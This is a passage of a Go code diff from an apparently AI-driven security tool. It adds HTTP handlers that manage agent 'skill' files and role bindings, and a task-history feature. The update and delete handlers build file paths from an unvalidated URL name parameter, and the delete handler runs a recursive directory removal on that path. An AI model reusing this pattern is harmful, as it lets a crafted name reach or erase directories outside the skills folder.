||||
mcpsNode := ensureArray(roleNode, "mcps")
|
||||
mcpsNode.Content = nil
|
||||
for _, mcpName := range role.MCPs {
|
||||
mcpNode := &yaml.Node{Kind: yaml.ScalarNode, Tag: "!!str", Value: mcpName}
|
||||
mcpsNode.Content = append(mcpsNode.Content, mcpNode)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// ensureArray 确保数组中存在指定key的数组节点
|
||||
func ensureArray(parent *yaml.Node, key string) *yaml.Node {
|
||||
_, valueNode := ensureKeyValue(parent, key)
|
||||
if valueNode.Kind != yaml.SequenceNode {
|
||||
valueNode.Kind = yaml.SequenceNode
|
||||
valueNode.Tag = "!!seq"
|
||||
valueNode.Content = nil
|
||||
}
|
||||
return valueNode
|
||||
}
|
||||
@@ -0,0 +1,778 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"net/http"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"regexp"
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/database"
|
||||
"cyberstrike-ai/internal/skills"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
"gopkg.in/yaml.v3"
|
||||
)
|
||||
|
||||
// SkillsHandler Skills处理器
|
||||
type SkillsHandler struct {
|
||||
manager *skills.Manager
|
||||
config *config.Config
|
||||
configPath string
|
||||
logger *zap.Logger
|
||||
db *database.DB // 数据库连接(用于获取调用统计)
|
||||
}
|
||||
|
||||
// NewSkillsHandler 创建新的Skills处理器
|
||||
func NewSkillsHandler(manager *skills.Manager, cfg *config.Config, configPath string, logger *zap.Logger) *SkillsHandler {
|
||||
return &SkillsHandler{
|
||||
manager: manager,
|
||||
config: cfg,
|
||||
configPath: configPath,
|
||||
logger: logger,
|
||||
}
|
||||
}
|
||||
|
||||
// SetDB 设置数据库连接(用于获取调用统计)
|
||||
func (h *SkillsHandler) SetDB(db *database.DB) {
|
||||
h.db = db
|
||||
}
|
||||
|
||||
// GetSkills 获取所有skills列表(支持分页和搜索)
|
||||
func (h *SkillsHandler) GetSkills(c *gin.Context) {
|
||||
skillList, err := h.manager.ListSkills()
|
||||
if err != nil {
|
||||
h.logger.Error("获取skills列表失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 搜索参数
|
||||
searchKeyword := strings.TrimSpace(c.Query("search"))
|
||||
|
||||
// 先加载所有skills的详细信息用于搜索过滤
|
||||
allSkillsInfo := make([]map[string]interface{}, 0, len(skillList))
|
||||
for _, skillName := range skillList {
|
||||
skill, err := h.manager.LoadSkill(skillName)
|
||||
if err != nil {
|
||||
h.logger.Warn("加载skill失败", zap.String("skill", skillName), zap.Error(err))
|
||||
continue
|
||||
}
|
||||
|
||||
// 获取文件信息
|
||||
skillPath := skill.Path
|
||||
skillFile := filepath.Join(skillPath, "SKILL.md")
|
||||
// 尝试其他可能的文件名
|
||||
if _, err := os.Stat(skillFile); os.IsNotExist(err) {
|
||||
alternatives := []string{
|
||||
filepath.Join(skillPath, "skill.md"),
|
||||
filepath.Join(skillPath, "README.md"),
|
||||
filepath.Join(skillPath, "readme.md"),
|
||||
}
|
||||
for _, alt := range alternatives {
|
||||
if _, err := os.Stat(alt); err == nil {
|
||||
skillFile = alt
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fileInfo, _ := os.Stat(skillFile)
|
||||
var fileSize int64
|
||||
var modTime string
|
||||
if fileInfo != nil {
|
||||
fileSize = fileInfo.Size()
|
||||
modTime = fileInfo.ModTime().Format("2006-01-02 15:04:05")
|
||||
}
|
||||
|
||||
skillInfo := map[string]interface{}{
|
||||
"name": skill.Name,
|
||||
"description": skill.Description,
|
||||
"path": skill.Path,
|
||||
"file_size": fileSize,
|
||||
"mod_time": modTime,
|
||||
}
|
||||
allSkillsInfo = append(allSkillsInfo, skillInfo)
|
||||
}
|
||||
|
||||
// 如果有搜索关键词,进行过滤
|
||||
filteredSkillsInfo := allSkillsInfo
|
||||
if searchKeyword != "" {
|
||||
keywordLower := strings.ToLower(searchKeyword)
|
||||
filteredSkillsInfo = make([]map[string]interface{}, 0)
|
||||
for _, skillInfo := range allSkillsInfo {
|
||||
name := strings.ToLower(fmt.Sprintf("%v", skillInfo["name"]))
|
||||
description := strings.ToLower(fmt.Sprintf("%v", skillInfo["description"]))
|
||||
path := strings.ToLower(fmt.Sprintf("%v", skillInfo["path"]))
|
||||
|
||||
if strings.Contains(name, keywordLower) ||
|
||||
strings.Contains(description, keywordLower) ||
|
||||
strings.Contains(path, keywordLower) {
|
||||
filteredSkillsInfo = append(filteredSkillsInfo, skillInfo)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 分页参数
|
||||
limit := 20 // 默认每页20条
|
||||
offset := 0
|
||||
if limitStr := c.Query("limit"); limitStr != "" {
|
||||
if parsed, err := parseInt(limitStr); err == nil && parsed > 0 {
|
||||
// 允许更大的limit用于搜索场景,但设置一个合理的上限(10000)
|
||||
if parsed <= 10000 {
|
||||
limit = parsed
|
||||
} else {
|
||||
limit = 10000
|
||||
}
|
||||
}
|
||||
}
|
||||
if offsetStr := c.Query("offset"); offsetStr != "" {
|
||||
if parsed, err := parseInt(offsetStr); err == nil && parsed >= 0 {
|
||||
offset = parsed
|
||||
}
|
||||
}
|
||||
|
||||
// 计算分页范围
|
||||
total := len(filteredSkillsInfo)
|
||||
start := offset
|
||||
end := offset + limit
|
||||
if start > total {
|
||||
start = total
|
||||
}
|
||||
if end > total {
|
||||
end = total
|
||||
}
|
||||
|
||||
// 获取当前页的skill列表
|
||||
var paginatedSkillsInfo []map[string]interface{}
|
||||
if start < end {
|
||||
paginatedSkillsInfo = filteredSkillsInfo[start:end]
|
||||
} else {
|
||||
paginatedSkillsInfo = []map[string]interface{}{}
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"skills": paginatedSkillsInfo,
|
||||
"total": total,
|
||||
"limit": limit,
|
||||
"offset": offset,
|
||||
})
|
||||
}
|
||||
|
||||
// GetSkill 获取单个skill的详细信息
|
||||
func (h *SkillsHandler) GetSkill(c *gin.Context) {
|
||||
skillName := c.Param("name")
|
||||
if skillName == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
skill, err := h.manager.LoadSkill(skillName)
|
||||
if err != nil {
|
||||
h.logger.Warn("加载skill失败", zap.String("skill", skillName), zap.Error(err))
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "skill不存在: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 获取文件信息
|
||||
skillPath := skill.Path
|
||||
skillFile := filepath.Join(skillPath, "SKILL.md")
|
||||
if _, err := os.Stat(skillFile); os.IsNotExist(err) {
|
||||
alternatives := []string{
|
||||
filepath.Join(skillPath, "skill.md"),
|
||||
filepath.Join(skillPath, "README.md"),
|
||||
filepath.Join(skillPath, "readme.md"),
|
||||
}
|
||||
for _, alt := range alternatives {
|
||||
if _, err := os.Stat(alt); err == nil {
|
||||
skillFile = alt
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fileInfo, _ := os.Stat(skillFile)
|
||||
var fileSize int64
|
||||
var modTime string
|
||||
if fileInfo != nil {
|
||||
fileSize = fileInfo.Size()
|
||||
modTime = fileInfo.ModTime().Format("2006-01-02 15:04:05")
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"skill": map[string]interface{}{
|
||||
"name": skill.Name,
|
||||
"description": skill.Description,
|
||||
"content": skill.Content,
|
||||
"path": skill.Path,
|
||||
"file_size": fileSize,
|
||||
"mod_time": modTime,
|
||||
},
|
||||
})
|
||||
}
|
||||
|
||||
// GetSkillBoundRoles 获取绑定指定skill的角色列表
|
||||
func (h *SkillsHandler) GetSkillBoundRoles(c *gin.Context) {
|
||||
skillName := c.Param("name")
|
||||
if skillName == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
boundRoles := h.getRolesBoundToSkill(skillName)
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"skill": skillName,
|
||||
"bound_roles": boundRoles,
|
||||
"bound_count": len(boundRoles),
|
||||
})
|
||||
}
|
||||
|
||||
// getRolesBoundToSkill 获取绑定指定skill的角色列表(不修改配置)
|
||||
func (h *SkillsHandler) getRolesBoundToSkill(skillName string) []string {
|
||||
if h.config.Roles == nil {
|
||||
return []string{}
|
||||
}
|
||||
|
||||
boundRoles := make([]string, 0)
|
||||
for roleName, role := range h.config.Roles {
|
||||
// 确保角色名称正确设置
|
||||
if role.Name == "" {
|
||||
role.Name = roleName
|
||||
}
|
||||
|
||||
// 检查角色的Skills列表中是否包含该skill
|
||||
if len(role.Skills) > 0 {
|
||||
for _, skill := range role.Skills {
|
||||
if skill == skillName {
|
||||
boundRoles = append(boundRoles, roleName)
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return boundRoles
|
||||
}
|
||||
|
||||
// CreateSkill 创建新skill
|
||||
func (h *SkillsHandler) CreateSkill(c *gin.Context) {
|
||||
var req struct {
|
||||
Name string `json:"name" binding:"required"`
|
||||
Description string `json:"description"`
|
||||
Content string `json:"content" binding:"required"`
|
||||
}
|
||||
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 验证skill名称(只允许字母、数字、连字符和下划线)
|
||||
if !isValidSkillName(req.Name) {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称只能包含字母、数字、连字符和下划线"})
|
||||
return
|
||||
}
|
||||
|
||||
// 获取skills目录
|
||||
skillsDir := h.config.SkillsDir
|
||||
if skillsDir == "" {
|
||||
skillsDir = "skills"
|
||||
}
|
||||
configDir := filepath.Dir(h.configPath)
|
||||
if !filepath.IsAbs(skillsDir) {
|
||||
skillsDir = filepath.Join(configDir, skillsDir)
|
||||
}
|
||||
|
||||
// 创建skill目录
|
||||
skillDir := filepath.Join(skillsDir, req.Name)
|
||||
if err := os.MkdirAll(skillDir, 0755); err != nil {
|
||||
h.logger.Error("创建skill目录失败", zap.String("skill", req.Name), zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "创建skill目录失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 检查是否已存在
|
||||
skillFile := filepath.Join(skillDir, "SKILL.md")
|
||||
if _, err := os.Stat(skillFile); err == nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "skill已存在"})
|
||||
return
|
||||
}
|
||||
|
||||
// 构建SKILL.md内容
|
||||
var content strings.Builder
|
||||
content.WriteString("---\n")
|
||||
content.WriteString(fmt.Sprintf("name: %s\n", req.Name))
|
||||
if req.Description != "" {
|
||||
// 如果描述包含特殊字符,需要加引号
|
||||
desc := req.Description
|
||||
if strings.Contains(desc, ":") || strings.Contains(desc, "\n") {
|
||||
desc = fmt.Sprintf(`"%s"`, strings.ReplaceAll(desc, `"`, `\"`))
|
||||
}
|
||||
content.WriteString(fmt.Sprintf("description: %s\n", desc))
|
||||
}
|
||||
content.WriteString("version: 1.0.0\n")
|
||||
content.WriteString("---\n\n")
|
||||
content.WriteString(req.Content)
|
||||
|
||||
// 写入文件
|
||||
if err := os.WriteFile(skillFile, []byte(content.String()), 0644); err != nil {
|
||||
h.logger.Error("创建skill文件失败", zap.String("skill", req.Name), zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "创建skill文件失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("创建skill成功", zap.String("skill", req.Name))
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": "skill已创建",
|
||||
"skill": map[string]interface{}{
|
||||
"name": req.Name,
|
||||
"path": skillDir,
|
||||
},
|
||||
})
|
||||
}
|
||||
|
||||
// UpdateSkill 更新skill
|
||||
func (h *SkillsHandler) UpdateSkill(c *gin.Context) {
|
||||
skillName := c.Param("name")
|
||||
if skillName == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
var req struct {
|
||||
Description string `json:"description"`
|
||||
Content string `json:"content" binding:"required"`
|
||||
}
|
||||
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 获取skills目录
|
||||
skillsDir := h.config.SkillsDir
|
||||
if skillsDir == "" {
|
||||
skillsDir = "skills"
|
||||
}
|
||||
configDir := filepath.Dir(h.configPath)
|
||||
if !filepath.IsAbs(skillsDir) {
|
||||
skillsDir = filepath.Join(configDir, skillsDir)
|
||||
}
|
||||
|
||||
// 查找skill文件
|
||||
skillDir := filepath.Join(skillsDir, skillName)
|
||||
skillFile := filepath.Join(skillDir, "SKILL.md")
|
||||
if _, err := os.Stat(skillFile); os.IsNotExist(err) {
|
||||
alternatives := []string{
|
||||
filepath.Join(skillDir, "skill.md"),
|
||||
filepath.Join(skillDir, "README.md"),
|
||||
filepath.Join(skillDir, "readme.md"),
|
||||
}
|
||||
found := false
|
||||
for _, alt := range alternatives {
|
||||
if _, err := os.Stat(alt); err == nil {
|
||||
skillFile = alt
|
||||
found = true
|
||||
break
|
||||
}
|
||||
}
|
||||
if !found {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "skill不存在"})
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
// 读取现有文件以保留front matter中的name
|
||||
existingContent, err := os.ReadFile(skillFile)
|
||||
if err != nil {
|
||||
h.logger.Error("读取skill文件失败", zap.String("skill", skillName), zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "读取skill文件失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 解析现有内容,提取name
|
||||
existingName := skillName
|
||||
contentStr := string(existingContent)
|
||||
if strings.HasPrefix(contentStr, "---") {
|
||||
parts := strings.SplitN(contentStr, "---", 3)
|
||||
if len(parts) >= 2 {
|
||||
frontMatter := parts[1]
|
||||
lines := strings.Split(frontMatter, "\n")
|
||||
for _, line := range lines {
|
||||
line = strings.TrimSpace(line)
|
||||
if strings.HasPrefix(line, "name:") {
|
||||
name := strings.TrimSpace(strings.TrimPrefix(line, "name:"))
|
||||
name = strings.Trim(name, `"'`)
|
||||
if name != "" {
|
||||
existingName = name
|
||||
}
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 构建新的SKILL.md内容
|
||||
var newContent strings.Builder
|
||||
newContent.WriteString("---\n")
|
||||
newContent.WriteString(fmt.Sprintf("name: %s\n", existingName))
|
||||
if req.Description != "" {
|
||||
// 如果描述包含特殊字符,需要加引号
|
||||
desc := req.Description
|
||||
if strings.Contains(desc, ":") || strings.Contains(desc, "\n") {
|
||||
desc = fmt.Sprintf(`"%s"`, strings.ReplaceAll(desc, `"`, `\"`))
|
||||
}
|
||||
newContent.WriteString(fmt.Sprintf("description: %s\n", desc))
|
||||
}
|
||||
newContent.WriteString("version: 1.0.0\n")
|
||||
newContent.WriteString("---\n\n")
|
||||
newContent.WriteString(req.Content)
|
||||
|
||||
// 写入文件(统一使用SKILL.md)
|
||||
targetFile := filepath.Join(skillDir, "SKILL.md")
|
||||
if err := os.WriteFile(targetFile, []byte(newContent.String()), 0644); err != nil {
|
||||
h.logger.Error("更新skill文件失败", zap.String("skill", skillName), zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "更新skill文件失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 如果原文件不是SKILL.md,删除旧文件
|
||||
if skillFile != targetFile {
|
||||
os.Remove(skillFile)
|
||||
}
|
||||
|
||||
h.logger.Info("更新skill成功", zap.String("skill", skillName))
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": "skill已更新",
|
||||
})
|
||||
}
|
||||
|
||||
// DeleteSkill 删除skill
|
||||
func (h *SkillsHandler) DeleteSkill(c *gin.Context) {
|
||||
skillName := c.Param("name")
|
||||
if skillName == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
// 检查是否有角色绑定了该skill,如果有则自动移除绑定
|
||||
affectedRoles := h.removeSkillFromRoles(skillName)
|
||||
if len(affectedRoles) > 0 {
|
||||
h.logger.Info("从角色中移除skill绑定",
|
||||
zap.String("skill", skillName),
|
||||
zap.Strings("roles", affectedRoles))
|
||||
}
|
||||
|
||||
// 获取skills目录
|
||||
skillsDir := h.config.SkillsDir
|
||||
if skillsDir == "" {
|
||||
skillsDir = "skills"
|
||||
}
|
||||
configDir := filepath.Dir(h.configPath)
|
||||
if !filepath.IsAbs(skillsDir) {
|
||||
skillsDir = filepath.Join(configDir, skillsDir)
|
||||
}
|
||||
|
||||
// 删除skill目录
|
||||
skillDir := filepath.Join(skillsDir, skillName)
|
||||
if err := os.RemoveAll(skillDir); err != nil {
|
||||
h.logger.Error("删除skill失败", zap.String("skill", skillName), zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "删除skill失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
responseMsg := "skill已删除"
|
||||
if len(affectedRoles) > 0 {
|
||||
responseMsg = fmt.Sprintf("skill已删除,已自动从 %d 个角色中移除绑定: %s",
|
||||
len(affectedRoles), strings.Join(affectedRoles, ", "))
|
||||
}
|
||||
|
||||
h.logger.Info("删除skill成功", zap.String("skill", skillName))
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": responseMsg,
|
||||
"affected_roles": affectedRoles,
|
||||
})
|
||||
}
|
||||
|
||||
// GetSkillStats 获取skills调用统计信息
|
||||
func (h *SkillsHandler) GetSkillStats(c *gin.Context) {
|
||||
skillList, err := h.manager.ListSkills()
|
||||
if err != nil {
|
||||
h.logger.Error("获取skills列表失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 获取skills目录
|
||||
skillsDir := h.config.SkillsDir
|
||||
if skillsDir == "" {
|
||||
skillsDir = "skills"
|
||||
}
|
||||
configDir := filepath.Dir(h.configPath)
|
||||
if !filepath.IsAbs(skillsDir) {
|
||||
skillsDir = filepath.Join(configDir, skillsDir)
|
||||
}
|
||||
|
||||
// 从数据库加载调用统计
|
||||
var skillStatsMap map[string]*database.SkillStats
|
||||
if h.db != nil {
|
||||
dbStats, err := h.db.LoadSkillStats()
|
||||
if err != nil {
|
||||
h.logger.Warn("从数据库加载Skills统计信息失败", zap.Error(err))
|
||||
skillStatsMap = make(map[string]*database.SkillStats)
|
||||
} else {
|
||||
skillStatsMap = dbStats
|
||||
}
|
||||
} else {
|
||||
skillStatsMap = make(map[string]*database.SkillStats)
|
||||
}
|
||||
|
||||
// 构建统计信息(包含所有skills,即使没有调用记录)
|
||||
statsList := make([]map[string]interface{}, 0, len(skillList))
|
||||
totalCalls := 0
|
||||
totalSuccess := 0
|
||||
totalFailed := 0
|
||||
|
||||
for _, skillName := range skillList {
|
||||
stat, exists := skillStatsMap[skillName]
|
||||
if !exists {
|
||||
stat = &database.SkillStats{
|
||||
SkillName: skillName,
|
||||
TotalCalls: 0,
|
||||
SuccessCalls: 0,
|
||||
FailedCalls: 0,
|
||||
}
|
||||
}
|
||||
|
||||
totalCalls += stat.TotalCalls
|
||||
totalSuccess += stat.SuccessCalls
|
||||
totalFailed += stat.FailedCalls
|
||||
|
||||
lastCallTimeStr := ""
|
||||
if stat.LastCallTime != nil {
|
||||
lastCallTimeStr = stat.LastCallTime.Format("2006-01-02 15:04:05")
|
||||
}
|
||||
|
||||
statsList = append(statsList, map[string]interface{}{
|
||||
"skill_name": stat.SkillName,
|
||||
"total_calls": stat.TotalCalls,
|
||||
"success_calls": stat.SuccessCalls,
|
||||
"failed_calls": stat.FailedCalls,
|
||||
"last_call_time": lastCallTimeStr,
|
||||
})
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"total_skills": len(skillList),
|
||||
"total_calls": totalCalls,
|
||||
"total_success": totalSuccess,
|
||||
"total_failed": totalFailed,
|
||||
"skills_dir": skillsDir,
|
||||
"stats": statsList,
|
||||
})
|
||||
}
|
||||
|
||||
// ClearSkillStats 清空所有Skills统计信息
|
||||
func (h *SkillsHandler) ClearSkillStats(c *gin.Context) {
|
||||
if h.db == nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "数据库连接未配置"})
|
||||
return
|
||||
}
|
||||
|
||||
if err := h.db.ClearSkillStats(); err != nil {
|
||||
h.logger.Error("清空Skills统计信息失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "清空统计信息失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("已清空所有Skills统计信息")
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": "已清空所有Skills统计信息",
|
||||
})
|
||||
}
|
||||
|
||||
// ClearSkillStatsByName 清空指定skill的统计信息
|
||||
func (h *SkillsHandler) ClearSkillStatsByName(c *gin.Context) {
|
||||
skillName := c.Param("name")
|
||||
if skillName == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
if h.db == nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "数据库连接未配置"})
|
||||
return
|
||||
}
|
||||
|
||||
if err := h.db.ClearSkillStatsByName(skillName); err != nil {
|
||||
h.logger.Error("清空指定skill统计信息失败", zap.String("skill", skillName), zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "清空统计信息失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("已清空指定skill统计信息", zap.String("skill", skillName))
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": fmt.Sprintf("已清空skill '%s' 的统计信息", skillName),
|
||||
})
|
||||
}
|
||||
|
||||
// removeSkillFromRoles 从所有角色中移除指定的skill绑定
|
||||
// 返回受影响角色名称列表
|
||||
func (h *SkillsHandler) removeSkillFromRoles(skillName string) []string {
|
||||
if h.config.Roles == nil {
|
||||
return []string{}
|
||||
}
|
||||
|
||||
affectedRoles := make([]string, 0)
|
||||
rolesToUpdate := make(map[string]config.RoleConfig)
|
||||
|
||||
// 遍历所有角色,查找并移除skill绑定
|
||||
for roleName, role := range h.config.Roles {
|
||||
// 确保角色名称正确设置
|
||||
if role.Name == "" {
|
||||
role.Name = roleName
|
||||
}
|
||||
|
||||
// 检查角色的Skills列表中是否包含要删除的skill
|
||||
if len(role.Skills) > 0 {
|
||||
updated := false
|
||||
newSkills := make([]string, 0, len(role.Skills))
|
||||
for _, skill := range role.Skills {
|
||||
if skill != skillName {
|
||||
newSkills = append(newSkills, skill)
|
||||
} else {
|
||||
updated = true
|
||||
}
|
||||
}
|
||||
if updated {
|
||||
role.Skills = newSkills
|
||||
rolesToUpdate[roleName] = role
|
||||
affectedRoles = append(affectedRoles, roleName)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 如果有角色需要更新,保存到文件
|
||||
if len(rolesToUpdate) > 0 {
|
||||
// 更新内存中的配置
|
||||
for roleName, role := range rolesToUpdate {
|
||||
h.config.Roles[roleName] = role
|
||||
}
|
||||
// 保存更新后的角色配置到文件
|
||||
if err := h.saveRolesConfig(); err != nil {
|
||||
h.logger.Error("保存角色配置失败", zap.Error(err))
|
||||
}
|
||||
}
|
||||
|
||||
return affectedRoles
|
||||
}
|
||||
|
||||
// saveRolesConfig 保存角色配置到文件(从SkillsHandler调用)
|
||||
func (h *SkillsHandler) saveRolesConfig() error {
|
||||
configDir := filepath.Dir(h.configPath)
|
||||
rolesDir := h.config.RolesDir
|
||||
if rolesDir == "" {
|
||||
rolesDir = "roles" // 默认目录
|
||||
}
|
||||
|
||||
// 如果是相对路径,相对于配置文件所在目录
|
||||
if !filepath.IsAbs(rolesDir) {
|
||||
rolesDir = filepath.Join(configDir, rolesDir)
|
||||
}
|
||||
|
||||
// 确保目录存在
|
||||
if err := os.MkdirAll(rolesDir, 0755); err != nil {
|
||||
return fmt.Errorf("创建角色目录失败: %w", err)
|
||||
}
|
||||
|
||||
// 保存每个角色到独立的文件
|
||||
if h.config.Roles != nil {
|
||||
for roleName, role := range h.config.Roles {
|
||||
// 确保角色名称正确设置
|
||||
if role.Name == "" {
|
||||
role.Name = roleName
|
||||
}
|
||||
|
||||
// 使用角色名称作为文件名(安全化文件名,避免特殊字符)
|
||||
safeFileName := sanitizeRoleFileName(role.Name)
|
||||
roleFile := filepath.Join(rolesDir, safeFileName+".yaml")
|
||||
|
||||
// 将角色配置序列化为YAML
|
||||
roleData, err := yaml.Marshal(&role)
|
||||
if err != nil {
|
||||
h.logger.Error("序列化角色配置失败", zap.String("role", roleName), zap.Error(err))
|
||||
continue
|
||||
}
|
||||
|
||||
// 处理icon字段:确保包含\U的icon值被引号包围(YAML需要引号才能正确解析Unicode转义)
|
||||
roleDataStr := string(roleData)
|
||||
if role.Icon != "" && strings.HasPrefix(role.Icon, "\\U") {
|
||||
// 匹配 icon: \UXXXXXXXX 格式(没有引号),排除已经有引号的情况
|
||||
re := regexp.MustCompile(`(?m)^(icon:\s+)(\\U[0-9A-F]{8})(\s*)$`)
|
||||
roleDataStr = re.ReplaceAllString(roleDataStr, `${1}"${2}"${3}`)
|
||||
roleData = []byte(roleDataStr)
|
||||
}
|
||||
|
||||
// 写入文件
|
||||
if err := os.WriteFile(roleFile, roleData, 0644); err != nil {
|
||||
h.logger.Error("保存角色配置文件失败", zap.String("role", roleName), zap.String("file", roleFile), zap.Error(err))
|
||||
continue
|
||||
}
|
||||
|
||||
h.logger.Info("角色配置已保存到文件", zap.String("role", roleName), zap.String("file", roleFile))
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// sanitizeRoleFileName 将角色名称转换为安全的文件名
|
||||
func sanitizeRoleFileName(name string) string {
|
||||
// 替换可能不安全的字符
|
||||
replacer := map[rune]string{
|
||||
'/': "_",
|
||||
'\\': "_",
|
||||
':': "_",
|
||||
'*': "_",
|
||||
'?': "_",
|
||||
'"': "_",
|
||||
'<': "_",
|
||||
'>': "_",
|
||||
'|': "_",
|
||||
' ': "_",
|
||||
}
|
||||
|
||||
var result []rune
|
||||
for _, r := range name {
|
||||
if replacement, ok := replacer[r]; ok {
|
||||
result = append(result, []rune(replacement)...)
|
||||
} else {
|
||||
result = append(result, r)
|
||||
}
|
||||
}
|
||||
|
||||
fileName := string(result)
|
||||
// 如果文件名为空,使用默认名称
|
||||
if fileName == "" {
|
||||
fileName = "role"
|
||||
}
|
||||
|
||||
return fileName
|
||||
}
|
||||
|
||||
// isValidSkillName 验证skill名称是否有效
|
||||
func isValidSkillName(name string) bool {
|
||||
if name == "" || len(name) > 100 {
|
||||
return false
|
||||
}
|
||||
// 只允许字母、数字、连字符和下划线
|
||||
for _, r := range name {
|
||||
if !((r >= 'a' && r <= 'z') || (r >= 'A' && r <= 'Z') || (r >= '0' && r <= '9') || r == '-' || r == '_') {
|
||||
return false
|
||||
}
|
||||
}
|
||||
return true
|
||||
}
|
||||
@@ -23,16 +23,31 @@ type AgentTask struct {
|
||||
cancel func(error)
|
||||
}
|
||||
|
||||
// CompletedTask 已完成的任务(用于历史记录)
|
||||
type CompletedTask struct {
|
||||
ConversationID string `json:"conversationId"`
|
||||
Message string `json:"message,omitempty"`
|
||||
StartedAt time.Time `json:"startedAt"`
|
||||
CompletedAt time.Time `json:"completedAt"`
|
||||
Status string `json:"status"`
|
||||
}
|
||||
|
||||
// AgentTaskManager 管理正在运行的Agent任务
|
||||
type AgentTaskManager struct {
|
||||
mu sync.RWMutex
|
||||
tasks map[string]*AgentTask
|
||||
mu sync.RWMutex
|
||||
tasks map[string]*AgentTask
|
||||
completedTasks []*CompletedTask // 最近完成的任务历史
|
||||
maxHistorySize int // 最大历史记录数
|
||||
historyRetention time.Duration // 历史记录保留时间
|
||||
}
|
||||
|
||||
// NewAgentTaskManager 创建任务管理器
|
||||
func NewAgentTaskManager() *AgentTaskManager {
|
||||
return &AgentTaskManager{
|
||||
tasks: make(map[string]*AgentTask),
|
||||
tasks: make(map[string]*AgentTask),
|
||||
completedTasks: make([]*CompletedTask, 0),
|
||||
maxHistorySize: 50, // 最多保留50条历史记录
|
||||
historyRetention: 24 * time.Hour, // 保留24小时
|
||||
}
|
||||
}
|
||||
|
||||
@@ -118,9 +133,49 @@ func (m *AgentTaskManager) FinishTask(conversationID string, finalStatus string)
|
||||
task.Status = finalStatus
|
||||
}
|
||||
|
||||
// 保存到历史记录
|
||||
completedTask := &CompletedTask{
|
||||
ConversationID: task.ConversationID,
|
||||
Message: task.Message,
|
||||
StartedAt: task.StartedAt,
|
||||
CompletedAt: time.Now(),
|
||||
Status: finalStatus,
|
||||
}
|
||||
|
||||
// 添加到历史记录
|
||||
m.completedTasks = append(m.completedTasks, completedTask)
|
||||
|
||||
// 清理过期和过多的历史记录
|
||||
m.cleanupHistory()
|
||||
|
||||
// 从运行任务中移除
|
||||
delete(m.tasks, conversationID)
|
||||
}
|
||||
|
||||
